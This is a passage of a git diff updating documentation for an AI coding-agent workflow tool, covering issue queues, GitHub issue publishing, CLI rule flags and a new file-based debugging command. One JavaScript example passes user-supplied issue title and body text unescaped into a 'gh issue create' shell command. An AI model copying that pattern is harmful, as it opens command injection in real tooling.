│ └──────────────────────────────────────────────────────┘ │
|
||||
│ │
|
||||
│ 3. ccw issue queue dag (refresh) │
|
||||
│ → S-3 now ready → dispatch batch 2 (same worktree) │
|
||||
│ │
|
||||
│ 4. (if --worktree) ALL batches complete → cleanup worktree │
|
||||
│ → Prompt: Create PR / Merge to main / Keep branch │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
**Why this works for parallel:**
|
||||
- **ONE worktree for entire queue** → all solutions share same isolated workspace
|
||||
- `detail <id>` is READ-ONLY → no race conditions
|
||||
- Each executor handles **all tasks within a solution** sequentially
|
||||
- **One commit per solution** with formatted summary (not per-task)
|
||||
- `done <id>` updates only its own solution status
|
||||
- `queue dag` recalculates ready solutions after each batch
|
||||
- Solutions in same batch have NO file conflicts
|
||||
- Solutions in same batch have NO file conflicts (DAG guarantees)
|
||||
- **Main workspace stays clean** until merge/PR decision
|
||||
|
||||
## CLI Endpoint Contract
|
||||
|
||||
### `ccw issue queue dag`
|
||||
Returns dependency graph with parallel batches (solution-level):
|
||||
### `ccw issue queue list --brief --json`
|
||||
Returns queue index for selection (used when --queue not provided):
|
||||
```json
|
||||
{
|
||||
"active_queue_id": "QUE-20251215-001",
|
||||
"queues": [
|
||||
{ "id": "QUE-20251215-001", "status": "active", "issue_ids": ["ISS-001"], "total_solutions": 5, "completed_solutions": 2 }
|
||||
]
|
||||
}
|
||||
```
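
A minimal sketch of how an orchestrator might consume this output from the shell, assuming `jq` is available (field names taken from the example above):

```bash
QUEUE_ID=$(ccw issue queue list --brief --json | jq -r '.active_queue_id')
if [[ -z "${QUEUE_ID}" || "${QUEUE_ID}" == "null" ]]; then
  # No active queue: fall back to prompting the user with the entries in .queues[]
  ccw issue queue list --brief --json | \
    jq -r '.queues[] | "\(.id)\t\(.status)\t\(.completed_solutions)/\(.total_solutions)"'
fi
```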
|
||||
|
||||
### `ccw issue queue dag --queue <queue-id>`
|
||||
Returns dependency graph with parallel batches (solution-level, **--queue required**):
|
||||
```json
|
||||
{
|
||||
"queue_id": "QUE-...",
|
||||
|
||||
@@ -29,6 +29,10 @@ interface Issue {
|
||||
source_url?: string;
|
||||
labels?: string[];
|
||||
|
||||
// GitHub binding (for non-GitHub sources that publish to GitHub)
|
||||
github_url?: string; // https://github.com/owner/repo/issues/123
|
||||
github_number?: number; // 123
|
||||
|
||||
// Optional structured fields
|
||||
expected_behavior?: string;
|
||||
actual_behavior?: string;
|
||||
@@ -165,7 +169,30 @@ if (clarityScore < 2 && (!issueData.context || issueData.context.length < 20)) {
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 5: Create Issue
|
||||
### Phase 5: GitHub Publishing Decision (Non-GitHub Sources)
|
||||
|
||||
```javascript
|
||||
// For non-GitHub sources, ask if user wants to publish to GitHub
|
||||
let publishToGitHub = false;
|
||||
|
||||
if (issueData.source !== 'github') {
|
||||
const publishAnswer = AskUserQuestion({
|
||||
questions: [{
|
||||
question: 'Would you like to publish this issue to GitHub?',
|
||||
header: 'Publish',
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: 'Yes, publish to GitHub', description: 'Create issue on GitHub and link it' },
|
||||
{ label: 'No, keep local only', description: 'Store as local issue without GitHub sync' }
|
||||
]
|
||||
}]
|
||||
});
|
||||
|
||||
publishToGitHub = publishAnswer.answers?.['Publish']?.includes('Yes');
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 6: Create Issue
|
||||
|
||||
**Summary Display:**
|
||||
- Show ID, title, source, affected files (if any)
|
||||
@@ -220,8 +247,64 @@ EOF
|
||||
}
|
||||
```
|
||||
|
||||
**GitHub Publishing** (if user opted in):
|
||||
```javascript
|
||||
// Step 1: Create local issue FIRST
|
||||
const localIssue = createLocalIssue(issueData); // ccw issue create
|
||||
|
||||
// Step 2: Publish to GitHub if requested
|
||||
if (publishToGitHub) {
|
||||
const ghResult = Bash(`gh issue create --title "${issueData.title}" --body "${issueData.context}"`);
|
||||
// Parse GitHub URL from output
|
||||
const ghUrl = ghResult.match(/https:\/\/github\.com\/[\w-]+\/[\w-]+\/issues\/\d+/)?.[0];
|
||||
const ghNumber = parseInt(ghUrl?.match(/\/issues\/(\d+)/)?.[1]);
|
||||
|
||||
if (ghNumber) {
|
||||
// Step 3: Update local issue with GitHub binding
|
||||
Bash(`ccw issue update ${localIssue.id} --github-url "${ghUrl}" --github-number ${ghNumber}`);
|
||||
// Or via pipe:
|
||||
// echo '{"github_url":"${ghUrl}","github_number":${ghNumber}}' | ccw issue update ${localIssue.id}
|
||||
}
|
||||
}
|
||||
```
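
The same three steps can be sketched as plain shell, assuming `gh` is authenticated and prints the new issue URL on stdout (its usual behavior); the issue ID below is just the example used later in this section:

```bash
# 1. Local issue already created as ISS-20251229-001 via ccw issue create
# 2. Publish to GitHub and capture the URL
GH_URL=$(gh issue create --title "Login fails with special chars" --body "Expected: success. Actual: 500")
GH_NUMBER="${GH_URL##*/}"

# 3. Bind the GitHub issue back to the local one
ccw issue update ISS-20251229-001 --github-url "${GH_URL}" --github-number "${GH_NUMBER}"
```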
|
||||
|
||||
**Workflow:**
|
||||
```
|
||||
1. Create local issue (ISS-YYYYMMDD-NNN) → stored in .workflow/issues.jsonl
|
||||
2. If publishToGitHub:
|
||||
a. gh issue create → returns GitHub URL
|
||||
b. Update local issue with github_url + github_number binding
|
||||
3. Both local and GitHub issues exist, linked together
|
||||
```
|
||||
|
||||
**Example with GitHub Publishing:**
|
||||
```bash
|
||||
# User creates text issue
|
||||
/issue:new "Login fails with special chars. Expected: success. Actual: 500"
|
||||
|
||||
# System asks: "Would you like to publish this issue to GitHub?"
|
||||
# User selects: "Yes, publish to GitHub"
|
||||
|
||||
# Output:
|
||||
# ✓ Local issue created: ISS-20251229-001
|
||||
# ✓ Published to GitHub: https://github.com/org/repo/issues/123
|
||||
# ✓ GitHub binding saved to local issue
|
||||
# → Next step: /issue:plan ISS-20251229-001
|
||||
|
||||
# Resulting issue JSON:
|
||||
{
|
||||
"id": "ISS-20251229-001",
|
||||
"title": "Login fails with special chars",
|
||||
"source": "text",
|
||||
"github_url": "https://github.com/org/repo/issues/123",
|
||||
"github_number": 123,
|
||||
...
|
||||
}
|
||||
```
|
||||
|
||||
**Completion:**
|
||||
- Display created issue ID
|
||||
- Show GitHub URL (if published)
|
||||
- Show next step: `/issue:plan <id>`
|
||||
|
||||
## Execution Flow
|
||||
@@ -240,9 +323,16 @@ Phase 2: Data Extraction (branched by clarity)
|
||||
│ │ (3 files max) │ → feedback │
|
||||
└────────────┴─────────────────┴──────────────┘
|
||||
|
||||
Phase 3: Create Issue
|
||||
Phase 3: GitHub Publishing Decision (non-GitHub only)
|
||||
├─ Source = github: Skip (already from GitHub)
|
||||
└─ Source ≠ github: AskUserQuestion
|
||||
├─ Yes → publishToGitHub = true
|
||||
└─ No → publishToGitHub = false
|
||||
|
||||
Phase 4: Create Issue
|
||||
├─ Score ≥ 2: Direct creation
|
||||
└─ Score < 2: Confirm first → Create
|
||||
└─ If publishToGitHub: gh issue create → link URL
|
||||
|
||||
Note: Deep exploration & lifecycle deferred to /issue:plan
|
||||
```
|
||||
|
||||
@@ -131,7 +131,7 @@ TASK: • Analyze issue titles/tags semantically • Identify functional/archite
|
||||
MODE: analysis
|
||||
CONTEXT: Issue metadata only
|
||||
EXPECTED: JSON with groups array, each containing max 4 issue_ids, theme, rationale
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Each issue in exactly one group | Max 4 issues per group | Balance group sizes
|
||||
CONSTRAINTS: Each issue in exactly one group | Max 4 issues per group | Balance group sizes
|
||||
|
||||
INPUT:
|
||||
${JSON.stringify(issueSummaries, null, 2)}
|
||||
@@ -198,11 +198,12 @@ ${issueList}
|
||||
2. Load project context files
|
||||
3. Explore codebase (ACE semantic search)
|
||||
4. Plan solution with tasks (schema: solution-schema.json)
|
||||
5. Write solution to: .workflow/issues/solutions/{issue-id}.jsonl
|
||||
6. Single solution → auto-bind; Multiple → return for selection
|
||||
5. **If github_url exists**: Add final task to comment on GitHub issue
|
||||
6. Write solution to: .workflow/issues/solutions/{issue-id}.jsonl
|
||||
7. Single solution → auto-bind; Multiple → return for selection
|
||||
|
||||
### Rules
|
||||
- Solution ID format: SOL-{issue-id}-{seq}
|
||||
- Solution ID format: SOL-{issue-id}-{uid} (uid: 4 random alphanumeric chars, e.g., a7x9)
|
||||
- Single solution per issue → auto-bind via ccw issue bind
|
||||
- Multiple solutions → register only, return pending_selection
|
||||
- Tasks must have quantified acceptance.criteria
|
||||
|
||||
@@ -65,9 +65,13 @@ Queue formation command using **issue-queue-agent** that analyzes all bound solu
|
||||
--queues <n> Number of parallel queues (default: 1)
|
||||
--issue <id> Form queue for specific issue only
|
||||
--append <id> Append issue to active queue (don't create new)
|
||||
--force Skip active queue check, always create new queue
|
||||
|
||||
# CLI subcommands (ccw issue queue ...)
|
||||
ccw issue queue list List all queues with status
|
||||
ccw issue queue add <issue-id> Add issue to queue (interactive if active queue exists)
|
||||
ccw issue queue add <issue-id> -f Add to new queue without prompt (force)
|
||||
ccw issue queue merge <src> --queue <target> Merge source queue into target queue
|
||||
ccw issue queue switch <queue-id> Switch active queue
|
||||
ccw issue queue archive Archive current queue
|
||||
ccw issue queue delete <queue-id> Delete queue from history
|
||||
@@ -92,7 +96,7 @@ Phase 2-4: Agent-Driven Queue Formation (issue-queue-agent)
|
||||
│ ├─ Build dependency DAG from conflicts
|
||||
│ ├─ Calculate semantic priority per solution
|
||||
│ └─ Assign execution groups (parallel/sequential)
|
||||
└─ Each agent writes: queue JSON + index update
|
||||
└─ Each agent writes: queue JSON + index update (NOT active yet)
|
||||
|
||||
Phase 5: Conflict Clarification (if needed)
|
||||
├─ Collect `clarifications` arrays from all agents
|
||||
@@ -102,7 +106,24 @@ Phase 5: Conflict Clarification (if needed)
|
||||
|
||||
Phase 6: Status Update & Summary
|
||||
├─ Update issue statuses to 'queued'
|
||||
└─ Display queue summary (N queues), next step: /issue:execute
|
||||
└─ Display new queue summary (N queues)
|
||||
|
||||
Phase 7: Active Queue Check & Decision (REQUIRED)
|
||||
├─ Read queue index: ccw issue queue list --brief
|
||||
├─ Get generated queue ID from agent output
|
||||
├─ If NO active queue exists:
|
||||
│ ├─ Set generated queue as active_queue_id
|
||||
│ ├─ Update index.json
|
||||
│ └─ Display: "Queue created and activated"
|
||||
│
|
||||
└─ If active queue exists with items:
|
||||
├─ Display both queues to user
|
||||
├─ Use AskUserQuestion to prompt:
|
||||
│ ├─ "Use new queue (keep existing)" → Set new as active, keep old inactive
|
||||
│ ├─ "Merge: add new items to existing" → Merge new → existing, delete new
|
||||
│ ├─ "Merge: add existing items to new" → Merge existing → new, archive old
|
||||
│ └─ "Cancel" → Delete new queue, keep existing active
|
||||
└─ Execute chosen action
|
||||
```
|
||||
|
||||
## Implementation
|
||||
@@ -306,6 +327,41 @@ ccw issue update <issue-id> --status queued
|
||||
- Show unplanned issues (planned but NOT in queue)
|
||||
- Show next step: `/issue:execute`
|
||||
|
||||
### Phase 7: Active Queue Check & Decision
|
||||
|
||||
**After agent completes Phase 1-6, check for active queue:**
|
||||
|
||||
```bash
|
||||
ccw issue queue list --brief
|
||||
```
|
||||
|
||||
**Decision:**
|
||||
- If `active_queue_id` is null → `ccw issue queue switch <new-queue-id>` (activate new queue)
|
||||
- If active queue exists → Use **AskUserQuestion** to prompt user
|
||||
|
||||
**AskUserQuestion:**
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Active queue exists. How would you like to proceed?",
|
||||
header: "Queue Action",
|
||||
options: [
|
||||
{ label: "Merge into existing queue", description: "Add new items to active queue, delete new queue" },
|
||||
{ label: "Use new queue", description: "Switch to new queue, keep existing in history" },
|
||||
{ label: "Cancel", description: "Delete new queue, keep existing active" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
**Action Commands:**
|
||||
|
||||
| User Choice | Commands |
|
||||
|-------------|----------|
|
||||
| **Merge into existing** | `ccw issue queue merge <new-queue-id> --queue <active-queue-id>` then `ccw issue queue delete <new-queue-id>` |
|
||||
| **Use new queue** | `ccw issue queue switch <new-queue-id>` |
|
||||
| **Cancel** | `ccw issue queue delete <new-queue-id>` |
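
For example, the "Merge into existing queue" path boils down to the two commands from the table above, run in order (queue IDs are placeholders):

```bash
# Merge the freshly generated queue into the active one, then drop the duplicate
ccw issue queue merge QUE-20251216-002 --queue QUE-20251215-001
ccw issue queue delete QUE-20251216-002

# "Use new queue" is a single switch instead
ccw issue queue switch QUE-20251216-002
```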
|
||||
|
||||
## Storage Structure (Queue History)
|
||||
|
||||
@@ -360,6 +416,9 @@ ccw issue update <issue-id> --status queued
|
||||
| User cancels clarification | Abort queue formation |
|
||||
| **index.json not updated** | Auto-fix: Set active_queue_id to new queue |
|
||||
| **Queue file missing solutions** | Abort with error, agent must regenerate |
|
||||
| **User cancels queue add** | Display message, return without changes |
|
||||
| **Merge with empty source** | Skip merge, display warning |
|
||||
| **All items duplicate** | Skip merge, display "All items already exist" |
|
||||
|
||||
## Quality Checklist
|
||||
|
||||
|
||||
@@ -223,8 +223,8 @@ TASK:
|
||||
MODE: analysis
|
||||
CONTEXT: @src/**/*.controller.ts @src/**/*.routes.ts @src/**/*.dto.ts @src/**/middleware/**/*
|
||||
EXPECTED: JSON format API structure analysis report with modules, endpoints, security schemes, and error codes
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Strict RESTful standards | Identify all public endpoints | Document output language: {lang}
|
||||
" --tool gemini --mode analysis --cd {project_root}
|
||||
CONSTRAINTS: Strict RESTful standards | Identify all public endpoints | Document output language: {lang}
|
||||
" --tool gemini --mode analysis --rule analysis-code-patterns --cd {project_root}
|
||||
```
|
||||
|
||||
**Update swagger-planning-data.json** with analysis results:
|
||||
@@ -387,7 +387,7 @@ bash(cat ${session_dir}/.process/swagger-planning-data.json | jq -r '.api_struct
|
||||
"step": 1,
|
||||
"title": "Generate OpenAPI spec file",
|
||||
"description": "Create complete swagger.yaml specification file",
|
||||
"cli_prompt": "PURPOSE: Generate OpenAPI 3.0.3 specification file from analyzed API structure\nTASK:\n• Define openapi version: 3.0.3\n• Define info: title, description, version, contact, license\n• Define servers: development, staging, production environments\n• Define tags: organized by business modules\n• Define paths: all API endpoints with complete specifications\n• Define components: schemas, securitySchemes, parameters, responses\nMODE: write\nCONTEXT: @[api_analysis]\nEXPECTED: Complete swagger.yaml file following OpenAPI 3.0.3 specification\nRULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md) $(cat ~/.claude/workflows/cli-templates/prompts/documentation/swagger-api.txt) | Use {lang} for all descriptions | Strict RESTful standards",
|
||||
"cli_prompt": "PURPOSE: Generate OpenAPI 3.0.3 specification file from analyzed API structure\nTASK:\n• Define openapi version: 3.0.3\n• Define info: title, description, version, contact, license\n• Define servers: development, staging, production environments\n• Define tags: organized by business modules\n• Define paths: all API endpoints with complete specifications\n• Define components: schemas, securitySchemes, parameters, responses\nMODE: write\nCONTEXT: @[api_analysis]\nEXPECTED: Complete swagger.yaml file following OpenAPI 3.0.3 specification\nCONSTRAINTS: Use {lang} for all descriptions | Strict RESTful standards\n--rule documentation-swagger-api",
|
||||
"output": "swagger.yaml"
|
||||
}
|
||||
],
|
||||
@@ -429,7 +429,7 @@ bash(cat ${session_dir}/.process/swagger-planning-data.json | jq -r '.api_struct
|
||||
{
|
||||
"step": 1,
|
||||
"title": "Generate authentication documentation",
|
||||
"cli_prompt": "PURPOSE: Generate comprehensive authentication documentation for API security\nTASK:\n• Document authentication mechanism: JWT Bearer Token\n• Explain header format: Authorization: Bearer <token>\n• Describe token lifecycle: acquisition, refresh, expiration handling\n• Define permission levels: public, user, admin, super_admin\n• Document authentication failure responses: 401/403 error handling\nMODE: write\nCONTEXT: @[auth_patterns] @src/**/auth/**/* @src/**/guard/**/*\nEXPECTED: Complete authentication guide in {lang}\nRULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md) | Include code examples | Clear step-by-step instructions",
|
||||
"cli_prompt": "PURPOSE: Generate comprehensive authentication documentation for API security\nTASK:\n• Document authentication mechanism: JWT Bearer Token\n• Explain header format: Authorization: Bearer <token>\n• Describe token lifecycle: acquisition, refresh, expiration handling\n• Define permission levels: public, user, admin, super_admin\n• Document authentication failure responses: 401/403 error handling\nMODE: write\nCONTEXT: @[auth_patterns] @src/**/auth/**/* @src/**/guard/**/*\nEXPECTED: Complete authentication guide in {lang}\nCONSTRAINTS: Include code examples | Clear step-by-step instructions\n--rule development-feature",
|
||||
"output": "{auth_doc_name}"
|
||||
}
|
||||
],
|
||||
@@ -464,7 +464,7 @@ bash(cat ${session_dir}/.process/swagger-planning-data.json | jq -r '.api_struct
|
||||
{
|
||||
"step": 1,
|
||||
"title": "Generate error code specification document",
|
||||
"cli_prompt": "PURPOSE: Generate comprehensive error code specification for consistent API error handling\nTASK:\n• Define error response format: {code, message, details, timestamp}\n• Document authentication errors (AUTH_xxx): 401/403 series\n• Document parameter errors (PARAM_xxx): 400 series\n• Document business errors (BIZ_xxx): business logic errors\n• Document system errors (SYS_xxx): 500 series\n• For each error code: HTTP status, error message, possible causes, resolution suggestions\nMODE: write\nCONTEXT: @src/**/*.exception.ts @src/**/*.filter.ts\nEXPECTED: Complete error code specification in {lang} with tables and examples\nRULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md) | Include response examples | Clear categorization",
|
||||
"cli_prompt": "PURPOSE: Generate comprehensive error code specification for consistent API error handling\nTASK:\n• Define error response format: {code, message, details, timestamp}\n• Document authentication errors (AUTH_xxx): 401/403 series\n• Document parameter errors (PARAM_xxx): 400 series\n• Document business errors (BIZ_xxx): business logic errors\n• Document system errors (SYS_xxx): 500 series\n• For each error code: HTTP status, error message, possible causes, resolution suggestions\nMODE: write\nCONTEXT: @src/**/*.exception.ts @src/**/*.filter.ts\nEXPECTED: Complete error code specification in {lang} with tables and examples\nCONSTRAINTS: Include response examples | Clear categorization\n--rule development-feature",
|
||||
"output": "{error_doc_name}"
|
||||
}
|
||||
],
|
||||
@@ -523,7 +523,7 @@ bash(cat ${session_dir}/.process/swagger-planning-data.json | jq -r '.api_struct
|
||||
"step": 1,
|
||||
"title": "Generate module API documentation",
|
||||
"description": "Generate complete API documentation for ${module_name}",
|
||||
"cli_prompt": "PURPOSE: Generate complete RESTful API documentation for ${module_name} module\nTASK:\n• Create module overview: purpose, use cases, prerequisites\n• Generate endpoint index: grouped by functionality\n• For each endpoint document:\n - Functional description: purpose and business context\n - Request method: GET/POST/PUT/DELETE\n - URL path: complete API path\n - Request headers: Authorization and other required headers\n - Path parameters: {id} and other path variables\n - Query parameters: pagination, filters, etc.\n - Request body: JSON Schema format\n - Response body: success and error responses\n - Field description table: type, required, example, description\n• Add usage examples: cURL, JavaScript, Python\n• Add version info: v1.0.0, last updated date\nMODE: write\nCONTEXT: @[module_endpoints] @[source_code]\nEXPECTED: Complete module API documentation in {lang} with all endpoints fully documented\nRULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md) $(cat ~/.claude/workflows/cli-templates/prompts/documentation/swagger-api.txt) | RESTful standards | Include all response codes",
|
||||
"cli_prompt": "PURPOSE: Generate complete RESTful API documentation for ${module_name} module\nTASK:\n• Create module overview: purpose, use cases, prerequisites\n• Generate endpoint index: grouped by functionality\n• For each endpoint document:\n - Functional description: purpose and business context\n - Request method: GET/POST/PUT/DELETE\n - URL path: complete API path\n - Request headers: Authorization and other required headers\n - Path parameters: {id} and other path variables\n - Query parameters: pagination, filters, etc.\n - Request body: JSON Schema format\n - Response body: success and error responses\n - Field description table: type, required, example, description\n• Add usage examples: cURL, JavaScript, Python\n• Add version info: v1.0.0, last updated date\nMODE: write\nCONTEXT: @[module_endpoints] @[source_code]\nEXPECTED: Complete module API documentation in {lang} with all endpoints fully documented\nCONSTRAINTS: RESTful standards | Include all response codes\n--rule documentation-swagger-api",
|
||||
"output": "${module_doc_name}"
|
||||
}
|
||||
],
|
||||
@@ -559,7 +559,7 @@ bash(cat ${session_dir}/.process/swagger-planning-data.json | jq -r '.api_struct
|
||||
{
|
||||
"step": 1,
|
||||
"title": "Generate API overview",
|
||||
"cli_prompt": "PURPOSE: Generate API overview document with navigation and quick start guide\nTASK:\n• Create introduction: system features, tech stack, version\n• Write quick start guide: authentication, first request example\n• Build module navigation: categorized links to all modules\n• Document environment configuration: development, staging, production\n• List SDKs and tools: client libraries, Postman collection\nMODE: write\nCONTEXT: @[all_module_docs] @.workflow/docs/${project_name}/api/swagger.yaml\nEXPECTED: Complete API overview in {lang} with navigation links\nRULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md) | Clear structure | Quick start focus",
|
||||
"cli_prompt": "PURPOSE: Generate API overview document with navigation and quick start guide\nTASK:\n• Create introduction: system features, tech stack, version\n• Write quick start guide: authentication, first request example\n• Build module navigation: categorized links to all modules\n• Document environment configuration: development, staging, production\n• List SDKs and tools: client libraries, Postman collection\nMODE: write\nCONTEXT: @[all_module_docs] @.workflow/docs/${project_name}/api/swagger.yaml\nEXPECTED: Complete API overview in {lang} with navigation links\nCONSTRAINTS: Clear structure | Quick start focus\n--rule development-feature",
|
||||
"output": "README.md"
|
||||
}
|
||||
],
|
||||
@@ -602,7 +602,7 @@ bash(cat ${session_dir}/.process/swagger-planning-data.json | jq -r '.api_struct
|
||||
{
|
||||
"step": 1,
|
||||
"title": "Generate test report",
|
||||
"cli_prompt": "PURPOSE: Generate comprehensive API test validation report\nTASK:\n• Document test environment configuration\n• Calculate endpoint coverage statistics\n• Report test results: pass/fail counts\n• Document boundary tests: parameter limits, null values, special characters\n• Document exception tests: auth failures, permission denied, resource not found\n• List issues found with recommendations\nMODE: write\nCONTEXT: @[swagger_spec]\nEXPECTED: Complete test report in {lang} with detailed results\nRULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md) | Include test cases | Clear pass/fail status",
|
||||
"cli_prompt": "PURPOSE: Generate comprehensive API test validation report\nTASK:\n• Document test environment configuration\n• Calculate endpoint coverage statistics\n• Report test results: pass/fail counts\n• Document boundary tests: parameter limits, null values, special characters\n• Document exception tests: auth failures, permission denied, resource not found\n• List issues found with recommendations\nMODE: write\nCONTEXT: @[swagger_spec]\nEXPECTED: Complete test report in {lang} with detailed results\nCONSTRAINTS: Include test cases | Clear pass/fail status\n--rule development-tests",
|
||||
"output": "{test_doc_name}"
|
||||
}
|
||||
],
|
||||
|
||||
@@ -147,8 +147,8 @@ You are generating path-conditional rules for Claude Code.
|
||||
|
||||
## Instructions
|
||||
|
||||
Read the agent prompt template for detailed instructions:
|
||||
$(cat ~/.claude/workflows/cli-templates/prompts/rules/tech-rules-agent-prompt.txt)
|
||||
Read the agent prompt template for detailed instructions.
|
||||
Use --rule rules-tech-rules-agent-prompt to load the template automatically.
|
||||
|
||||
## Execution Steps
|
||||
|
||||
|
||||
@@ -424,6 +424,17 @@ CONTEXT_VARS:
|
||||
- **Agent execution failure**: Agent-specific retry with minimal dependencies
|
||||
- **Template loading issues**: Agent handles graceful degradation
|
||||
- **Synthesis conflicts**: Synthesis highlights disagreements without resolution
|
||||
- **Context overflow protection**: See below for automatic context management
|
||||
|
||||
## Context Overflow Protection
|
||||
|
||||
**Per-role limits**: See `conceptual-planning-agent.md` (< 3000 words main, < 2000 words sub-docs, max 5 sub-docs)
|
||||
|
||||
**Synthesis protection**: If total analysis > 100KB, synthesis reads only `analysis.md` files (not sub-documents)
|
||||
|
||||
**Recovery**: Check logs → reduce scope (--count 2) → use --summary-only → manual synthesis
|
||||
|
||||
**Prevention**: Start with --count 3, use structured topic format, review output sizes before synthesis
|
||||
|
||||
## Reference Information
|
||||
|
||||
|
||||
@@ -132,7 +132,7 @@ Scan and analyze workflow session directories:
|
||||
|
||||
**Staleness criteria**:
|
||||
- Active sessions: No modification >7 days + no related git commits
|
||||
- Archives: >30 days old + no feature references in project.json
|
||||
- Archives: >30 days old + no feature references in project-tech.json
|
||||
- Lite-plan: >7 days old + plan.json not executed
|
||||
- Debug: >3 days old + issue not in recent commits
|
||||
|
||||
@@ -443,8 +443,8 @@ if (selectedCategories.includes('Sessions')) {
|
||||
}
|
||||
}
|
||||
|
||||
// Update project.json if features referenced deleted sessions
|
||||
const projectPath = '.workflow/project.json'
|
||||
// Update project-tech.json if features referenced deleted sessions
|
||||
const projectPath = '.workflow/project-tech.json'
|
||||
if (fileExists(projectPath)) {
|
||||
const project = JSON.parse(Read(projectPath))
|
||||
const deletedPaths = new Set(results.deleted)
|
||||
|
||||
.claude/commands/workflow/debug-with-file.md (new file, 666 lines)
@@ -0,0 +1,666 @@
|
||||
---
|
||||
name: debug-with-file
|
||||
description: Interactive hypothesis-driven debugging with documented exploration, understanding evolution, and Gemini-assisted correction
|
||||
argument-hint: "\"bug description or error message\""
|
||||
allowed-tools: TodoWrite(*), Task(*), AskUserQuestion(*), Read(*), Grep(*), Glob(*), Bash(*), Edit(*), Write(*)
|
||||
---
|
||||
|
||||
# Workflow Debug-With-File Command (/workflow:debug-with-file)
|
||||
|
||||
## Overview
|
||||
|
||||
Enhanced evidence-based debugging with **documented exploration process**. Records understanding evolution, consolidates insights, and uses Gemini to correct misunderstandings.
|
||||
|
||||
**Core workflow**: Explore → Document → Log → Analyze → Correct Understanding → Fix → Verify
|
||||
|
||||
**Key enhancements over /workflow:debug**:
|
||||
- **understanding.md**: Timeline of exploration and learning
|
||||
- **Gemini-assisted correction**: Validates and corrects hypotheses
|
||||
- **Consolidation**: Simplifies proven-wrong understanding to avoid clutter
|
||||
- **Learning retention**: Preserves what was learned, even from failed attempts
|
||||
|
||||
## Usage
|
||||
|
||||
```bash
|
||||
/workflow:debug-with-file <BUG_DESCRIPTION>
|
||||
|
||||
# Arguments
|
||||
<bug-description> Bug description, error message, or stack trace (required)
|
||||
```
|
||||
|
||||
## Execution Process
|
||||
|
||||
```
|
||||
Session Detection:
|
||||
├─ Check if debug session exists for this bug
|
||||
├─ EXISTS + understanding.md exists → Continue mode
|
||||
└─ NOT_FOUND → Explore mode
|
||||
|
||||
Explore Mode:
|
||||
├─ Locate error source in codebase
|
||||
├─ Document initial understanding in understanding.md
|
||||
├─ Generate testable hypotheses with Gemini validation
|
||||
├─ Add NDJSON logging instrumentation
|
||||
└─ Output: Hypothesis list + await user reproduction
|
||||
|
||||
Analyze Mode:
|
||||
├─ Parse debug.log, validate each hypothesis
|
||||
├─ Use Gemini to analyze evidence and correct understanding
|
||||
├─ Update understanding.md with:
|
||||
│ ├─ New evidence
|
||||
│ ├─ Corrected misunderstandings (strikethrough + correction)
|
||||
│ └─ Consolidated current understanding
|
||||
└─ Decision:
|
||||
├─ Confirmed → Fix root cause
|
||||
├─ Inconclusive → Add more logging, iterate
|
||||
└─ All rejected → Gemini-assisted new hypotheses
|
||||
|
||||
Fix & Cleanup:
|
||||
├─ Apply fix based on confirmed hypothesis
|
||||
├─ User verifies
|
||||
├─ Document final understanding + lessons learned
|
||||
├─ Remove debug instrumentation
|
||||
└─ If not fixed → Return to Analyze mode
|
||||
```
|
||||
|
||||
## Implementation
|
||||
|
||||
### Session Setup & Mode Detection
|
||||
|
||||
```javascript
|
||||
const getUtc8ISOString = () => new Date(Date.now() + 8 * 60 * 60 * 1000).toISOString()
|
||||
|
||||
const bugSlug = bug_description.toLowerCase().replace(/[^a-z0-9]+/g, '-').substring(0, 30)
|
||||
const dateStr = getUtc8ISOString().substring(0, 10)
|
||||
|
||||
const sessionId = `DBG-${bugSlug}-${dateStr}`
|
||||
const sessionFolder = `.workflow/.debug/${sessionId}`
|
||||
const debugLogPath = `${sessionFolder}/debug.log`
|
||||
const understandingPath = `${sessionFolder}/understanding.md`
|
||||
const hypothesesPath = `${sessionFolder}/hypotheses.json`
|
||||
|
||||
// Auto-detect mode
|
||||
const sessionExists = fs.existsSync(sessionFolder)
|
||||
const hasUnderstanding = sessionExists && fs.existsSync(understandingPath)
|
||||
const logHasContent = sessionExists && fs.existsSync(debugLogPath) && fs.statSync(debugLogPath).size > 0
|
||||
|
||||
const mode = logHasContent ? 'analyze' : (hasUnderstanding ? 'continue' : 'explore')
|
||||
|
||||
if (!sessionExists) {
|
||||
bash(`mkdir -p ${sessionFolder}`)
|
||||
}
|
||||
```
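
For reference, a rough shell equivalent of the session naming above (illustrative only; it uses the local date rather than the UTC+8 helper):

```bash
BUG_DESCRIPTION="Login fails with 500 on special characters"
# Lowercase, collapse non-alphanumerics to dashes, cap at 30 chars
BUG_SLUG=$(printf '%s' "${BUG_DESCRIPTION}" | tr '[:upper:]' '[:lower:]' | sed -E 's/[^a-z0-9]+/-/g' | cut -c1-30)
SESSION_ID="DBG-${BUG_SLUG}-$(date +%F)"
mkdir -p ".workflow/.debug/${SESSION_ID}"
```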
|
||||
|
||||
---
|
||||
|
||||
### Explore Mode
|
||||
|
||||
**Step 1.1: Locate Error Source**
|
||||
|
||||
```javascript
|
||||
// Extract keywords from bug description
|
||||
const keywords = extractErrorKeywords(bug_description)
|
||||
|
||||
// Search codebase for error locations
|
||||
const searchResults = []
|
||||
for (const keyword of keywords) {
|
||||
const results = Grep({ pattern: keyword, path: ".", output_mode: "content", "-C": 3 })
|
||||
searchResults.push({ keyword, results })
|
||||
}
|
||||
|
||||
// Identify affected files and functions
|
||||
const affectedLocations = analyzeSearchResults(searchResults)
|
||||
```
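
From a shell, the equivalent search is a plain grep over the repo; the error string and search root below are only examples:

```bash
# 3 lines of context around each hit, capped so the output stays reviewable
grep -rn -C 3 "TypeError: cannot read properties of undefined" src/ | head -n 80
```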
|
||||
|
||||
**Step 1.2: Document Initial Understanding**
